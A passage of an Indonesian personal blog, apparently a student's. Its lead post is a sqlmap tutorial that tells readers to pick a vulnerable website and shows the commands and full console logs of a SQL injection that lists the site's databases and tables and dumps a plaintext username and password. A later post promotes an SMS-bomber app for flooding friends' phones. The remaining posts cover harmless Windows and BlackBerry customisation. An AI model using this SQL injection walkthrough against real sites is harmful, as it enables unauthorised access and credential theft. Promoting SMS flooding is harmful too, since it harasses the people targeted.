Social Icons

Minggu, Februari 24, 2013

SQL Map In Windows


 Hallo saya hanya ingin berbagi ilmu saja SQL Map di Windows ini saya pake Win7 itu themanya di SS classic jadi seperti XP,, hehehe
Ok langsung saja Download dahulu alat perangnya:



-SQL Map 0.0.9
-Pyhton 2.7



Install pythonnya
extract SQLmapnya(misalkan saya extrack di C:\sqlmap )

Pertama Siapkan website yang vuln
sekarang kita buka cmd (command and prompt)
Klik Start ->All Programs -> Accessories-> Command and prompt
atau WIN-Key + R ketik cmd  (Start -> Run ->ketik  CMD  enter)

sekarang kita menuju direktory dimana tempat folder sqlmap berada
pertama kita ketik perintah cd\  [enter]
maka kita akan drive C
lalu menuju folder sqlmap dengan cara ketik
cd sqlmap [enter]
maka akan ke C:\sqlmap>

Ok kita mulai
ketik perintah yang berwarna merah setelah menuju folder sqlmap berada folder sqlmap saya di drive C:\sqlmap
______________
sqlmap.py -u http://www.targetnmu.co.id/product.php?kat1=3 --dbs
yang berwarna biru diganti web vuln kamu
lihat gambar ini:




setelah di enter maka script sqlmap akan bekerja untuk mencari nama databasenya
Berikut Log Lengkap cmd nya



C:\sqlmap>sqlmap.py -u http://www.targetmu.co.id/product.php?kat1=3 --dbs

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 19:40:56

[19:40:57] [INFO] using 'C:\sqlmap\output\www.targetmu.co.id\session' as sessio
n file
[19:40:57] [INFO] testing connection to the target url
[19:41:04] [INFO] testing if the url is stable, wait a few seconds
[19:41:09] [INFO] url is stable
[19:41:09] [INFO] testing if GET parameter 'kat1' is dynamic
[19:41:12] [INFO] confirming that GET parameter 'kat1' is dynamic
[19:41:15] [INFO] GET parameter 'kat1' is dynamic
[19:41:18] [INFO] heuristic test shows that GET parameter 'kat1' might be inject
able (possible DBMS: MySQL)
[19:41:18] [INFO] testing sql injection on GET parameter 'kat1'
[19:41:18] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:41:50] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:42:18] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:42:45] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
parsed error message(s) showed that the back-end DBMS could be MySQL. Do you wan
t to skip test payloads specific for other DBMSes? [Y/n] y
[19:43:30] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[19:45:12] [CRITICAL] connection timed out to the target url or proxy, sqlmap is
 going to retry the request
[19:45:38] [INFO] target url appears to be UNION injectable with 2 columns
[19:45:47] [INFO] GET parameter 'kat1' is 'MySQL UNION query (NULL) - 1 to 10 co
lumns' injectable
GET parameter 'kat1' is vulnerable. Do you want to keep testing the others? [y/N
] n
sqlmap identified the following injection points with a total of 42 HTTP(s) requ
ests:
---
Place: GET
Parameter: kat1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: kat1=3 UNION ALL SELECT CONCAT(CHAR(58,122,104,120,58),CHAR(82,70,1
13,82,104,106,74,65,116,103),CHAR(58,106,113,113,58)), NULL#
---

[19:45:53] [INFO] testing MySQL
[19:45:59] [INFO] confirming MySQL
[19:46:12] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
[19:46:12] [INFO] fetching database names
available databases [2]:
[*] green_datadedaunan
[*] information_schema

[19:46:16] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
targetmu.co.id'

[*] shutting down at: 19:46:16



Lihat yang warna merah itu adalah database web


Lalu kita lihat isi tablenya dengan mengetik

sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan --tables [enter]


yang warna merah diganti web targetnya terus  warna hijau database nya diganti database yng muncul
fungsi :
-D = database
--tables=untuk mendapat tables dari db




Log CMD nya


C:\sqlmap>sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_da
tadedaunan --tables

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 19:46:35

[19:46:35] [INFO] using 'C:\sqlmap\output\www.targetjlaco.id\session' as sessio
n file
[19:46:35] [INFO] resuming injection data from session file
[19:46:35] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:46:35] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: kat1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: kat1=3 UNION ALL SELECT CONCAT(CHAR(58,122,104,120,58),CHAR(82,70,1
13,82,104,106,74,65,116,103),CHAR(58,106,113,113,58)), NULL#
---

[19:46:42] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
[19:46:42] [INFO] fetching tables for database 'green_datadedaunan'
Database: green_datadedaunan
[6 tables]
+--------------+
| green_kat1   |
| green_kat2   |
| green_news   |
| green_page   |
| green_produk |
| green_user   |
+--------------+

[19:46:48] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
targetkamu.co.id'

[*] shutting down at: 19:46:48



eh muncul juga table dalam databasenya

+--------------+
| green_kat1   |
| green_kat2   |
| green_news   |
| green_page   |
| green_produk |
| green_user   |
+--------------+

kita lihat dari table tersebut kira2 user dimana? mungkin di green_user :)
ayo kita check dengan perintah ini
sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan -T green_users --columns [ENter]
-T = nama table
--columns=melihat columns di table



Log CMD


C:\sqlmap>sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_da
tadedaunan -T green_user --columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 19:47:03

[19:47:04] [INFO] using 'C:\sqlmap\output\www.targe.co.id\session' as sessio
n file
[19:47:04] [INFO] resuming injection data from session file
[19:47:04] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:47:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: kat1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: kat1=3 UNION ALL SELECT CONCAT(CHAR(58,122,104,120,58),CHAR(82,70,1
13,82,104,106,74,65,116,103),CHAR(58,106,113,113,58)), NULL#
---

[19:47:10] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
[19:47:10] [INFO] fetching columns for table 'green_user' on database 'green_dat
adedaunan'
Database: green_datadedaunan
Table: green_user
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(6)  |
| sbg      | char(1)     |
| username | varchar(20) |
+----------+-------------+

[19:47:15] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
targetkamu.co.id'

[*] shutting down at: 19:47:15



Sekarang kita lihat username dan passwordnya dari column tersbut


sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_datadedaunan -T green_users -C username,password,sbg --dump

yang berwaran hijau tegantung web tersbit memilik db , tabel, column apa






C:\sqlmap>sqlmap.py -u http://www.targetkamu.co.id/product.php?kat1=3 -D green_da
tadedaunan -T green_user -C username,password,sbg --dump

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 19:47:44

[19:47:44] [INFO] using 'C:\sqlmap\output\www.targetkamu.co.id\session' as sessio
n file
[19:47:44] [INFO] resuming injection data from session file
[19:47:44] [INFO] resuming back-end DBMS 'mysql 5' from session file
[19:47:44] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: kat1
    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: kat1=3 UNION ALL SELECT CONCAT(CHAR(58,122,104,120,58),CHAR(82,70,1
13,82,104,106,74,65,116,103),CHAR(58,106,113,113,58)), NULL#
---

[19:47:48] [INFO] the back-end DBMS is MySQL

web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
[19:47:48] [INFO] fetching columns 'username, password, sbg' entries for table '
green_user' on database 'green_datadedaunan'
Database: green_datadedaunan
Table: green_user
[1 entry]
+----------+-----+----------+
| password | sbg | username |
+----------+-----+----------+
| hijau    | 1   | marbun   |
+----------+-----+----------+

[19:47:53] [INFO] Table 'green_datadedaunan.green_user' dumped to CSV file 'C:\s
qlmap\output\www.targetkamu.co.id\dump\green_datadedaunan\green_user.csv'
[19:47:53] [INFO] Fetched data logged to text files under 'C:\sqlmap\output\www.
target.co.id'

[*] shutting down at: 19:47:53






Lihat itu username dan passwordnya ^ atau yg gambar ini




semoga mudeng dengan tutorial yang saya buat , sekian terimakasih
readmore...

Sabtu, Februari 23, 2013

Tentang Saya





Salam sejahtera semua , kali ini saya posting tentang saya , karena ada tugas kkpi .. 


Nama    : Muhamad Radil
Kelas   : XI TKJ2
no      : 9


facebook    > Radil Art Crew
twitter     > @Radil_art


Sekian Terimakasih
readmore...

Minggu, November 04, 2012

Cara mengubah starting dan resuming win7




Bosan dengan tampilan pertama kali pada saat windows 7 anda booting? sekarang kita bisa dengan mudah mengganti gambar animasi sesuka anda dan mengganti tulisan Microsoft corporation , starting windows , resuming windows sesuka anda juga ,, siapapun bisa menggunakannya karena sangat mudah yaitu dengan  memakai program “boot starting win 7”,

oke langsung saja


keterangan :
1. anda bisa memilih image / gif yang anda inginkan dari data anda
2. anda dapat mengubah tulisan @microsoft corparation sesuka anda
3. anda dapat mengubah tulisan starting windows menjadi sesuka anda
4. kalau sudah silahkan tekan Apply dan akan proses , lalu restart dan lihat gambar bootingnya sudah   
    berubah kan ,,,
5. resuming caranya sama dengan no 1 2 3 4 



sedot2.png

pasword media fire 
pasword winrar 
readmore...

Kamis, November 01, 2012

Advance OS and LED 15.4 blackberry



20 + Apps dalam 1 App (App utilitas yang paling kuat yang dibuat untuk BlackBerry ®)

* Tahu jika itu adalah ™ BBM, SMS, Email atau Panggilan dengan membuat upto 4 Ringtones berbeda & LED PER Contact.
* Baca pesan Anda (BBM ™, Email, SMS) tanpa membuka aplikasi apapun atau bahkan menyentuh ponsel Anda.
* Ulangi peringatan terdengar pengingat untuk BBM ™, Email, SMS, panggilan tak terjawab.
* Membuat LED kustom untuk baterai, jaringan, Wifi, Bluetooth dan semua Pemberitahuan aplikasi.
* Restart atau jadwal telepon restart tanpa tarik baterai.
* Baterai & memantau penggunaan fitur (statistik penuh pada semua obrolan Anda, panggilan, perangkat dan penggunaan baterai).
* AutoText (Pergantian Firman) Manager, ekspor / impor, berbagi dan mengedit pada PC.
* Backup, restore & email semua kontak (dengan foto), ekspor ke (Excel, Outlook, Gmail), menemukan / Merge kontak duplikat dan Pindahkan semua kontak ke daftar default atau mengelola beberapa daftar kontak.
* Instan pintas peluncur untuk memulai aplikasi, website terbuka, teman panggilan, mengotomatisasi tindakan Anda, menampilkan tanggal, waktu, baterai dan status wifi dari layar manapun.
* Download semua lampiran email secara otomatis.
* Ambil screenshot tanpa watermark.
* Gunakan kamera, LED atau lampu layar sebagai senter tanpa batas waktu.
* Kontrol layar backlight untuk menjaga layar selama yang Anda inginkan.
* Memberikan suara untuk baterai dan status jaringan (membuat suara ketika Anda memulai, menghentikan pengisian atau baterai penuh).
* Tampilkan Waktu dan Tanggal dalam menu setiap.
* Wallpaper changer akan mengubah background homescreen Anda (wallpaper) setiap kali Anda melihat layar Anda.
* Mengatur telepon pengingat panggilan getaran durasi / waktu saat panggilan berlangsung.
* Konfirmasi ulang panggilan, panggilan panggilan konfirmasi dan menyimpan nomor tak dikenal setelah panggilan telepon.
* Kunci layar panggilan sementara di panggilan dan menampilkan gambar layar kontak penuh.
* Mengatur speaker panggilan keras dan bergetar panggilan terhubung, bisu, tahan, dan banyak lagi.
* Getar ketika menekan tombol virtual atau fisik dalam semua aplikasi.

# Lebih detail tentang beberapa fitur:

--- Fitur BBM ---
- Baca pesan BBM tanpa teman Anda melihat 'R.
- Auto menghapus riwayat obrolan Anda.
- Menetapkan lampu LED dan nada dering untuk Setiap kontak BBM (unlimited).

--- LED Fitur ---
- Efek: Fade / mencampur atau berkedip warna lampu LED.
- Color Picker: Lebih dari 100 warna dan nuansa yang tersedia menggunakan color picker, sampai dengan 4 warna per kontak atau aplikasi dan 14 efek per warna.
- Multi-Warna: membuat lampu sendiri disko sampai dengan 12 warna.
- Caller ID: kontak terbatas termasuk kontak BBM terbatas.
- Malam Profil: jadwal apa yang LED lampu Anda ingin otomatis menonaktifkan atau lebih rendah kecerahan warna di malam hari.

--- Fitur Popup ---
- Popup dapat menandai sebagai read / menghapus / panggil / Peluncuran app / balasan / maju dan banyak lagi.
- Popup bisa bangun dari layar ponsel siaga, tidak lebih menyentuh ponsel Anda untuk melihat pesan.

Fitur --- App Tambahan ---
- Backup / restore semua pengaturan dengan pilihan untuk mengirim sebagai lampiran email.
- Apakah SANGAT kecil di UKURAN, dengan BATERAI sangat kecil & penggunaan memori, MEMBANDINGKAN.

Source : https://appworld.blackberry.com/webstore/content/45506/?lang=en

Download offline Advance OS and LED 15.4
http://adf.ly/EBllI


Cara instal aplikasi offline bisa di lihat disini : Cara instal aplikasi blackberry secara offline
readmore...

Cara instal aplikasi blackberry secara offline



Sesuai dengan judulnya Cara instal aplikasi blackberry secara offline, berikut ini saya akan mecoba menjelaskan bagaimana cara menginstal aplikasi secara offline pada blackberry, berikut langkah langkahnya :
1. Download offline instalernya melalui komputer, sebagai contoh Jingu Smileys Premium 1.4.2
2. Kemudian ekstrak file Jingu Smileys Premium 1.4.2.rar (klik kanan Extract Here)
3. Setelah itu sambungkan blackberry ke komputer dengan menggunakan kabel data
4. Lalu copykan file Jingu Smileys Premium 1.4.2 yang telah di ekstrak tadi kedalam blackberry.
5. Nah sekarang kita berpindah ke blackberry, masuk ke file (blackberry) dan cari dimana anada mengcopykan file Jingu Smileys Premium 1.4.2 tadi
6. Setelah ketemu, klik file yang berekstensi jad (JinguSmileysPremium.jad) dan kemudian pilih download (proses download terjadi di dalam file blackberry jadi tidak menggunakan koneksi bis) tunggu hingga proses selesai.




readmore...

Selasa, Oktober 30, 2012

Aplikasi bom sms java




Aplikasi bom SMS merupakan aplikasi yang dapat mengirim sms dalam berjumlah banyak dalam waktu yang singkat. Aplikasi bom sms java ini sudah pasti dapat diinstal di hp java maupun hp symbian anda.

Aplikasi yang bisa ngebom sms ini bernama FarceSMS. Sekarang dengan apliksi ini anda dapat mengerjai dan mengusili teman anda dengan mengirim sms secara berjamaah. Tapi ingat gunakan aplikasi bom sms dengan bijak ya.





sedot2.png

pasword media fire 

readmore...

Senin, Oktober 29, 2012

Android Jelly Bean Skin Pack for Windows 7



Sobat disini tentunya sudah pada tau tentang Skin Pack donk. Skin Pack adalah software atau tool yang dapat mempercantik tampilan Windows sobat. Nah, Skin Pack ini sangat cocok digunakan apabila sobat sudah mulai bosan dengan tampilan Windows yang biasa-biasa saja. Kali ini, saya akan membagikan sebuah Skin Pack yang bernama Android Jelly Bean Skin Pack for Windows 7. Bagi sobat yang ingin merasakan sensasi Android Jelly Bean di komputernya/laptopnya, sobat bisa menggunakan Skin Pack ini.

Screenshot










untuk menambahkan widget lainnya klik icon di bawah pojok kanan dan klik yang 
namanya  XWidget 1.5.0.612




pilih deh widget yang anda suka




Download:

status for windows 7

pasword media fire   

note : untuk mengetahui berapa bit windows 7 sobat , silahkan berkunjung postingan sebelumnya klik
readmore...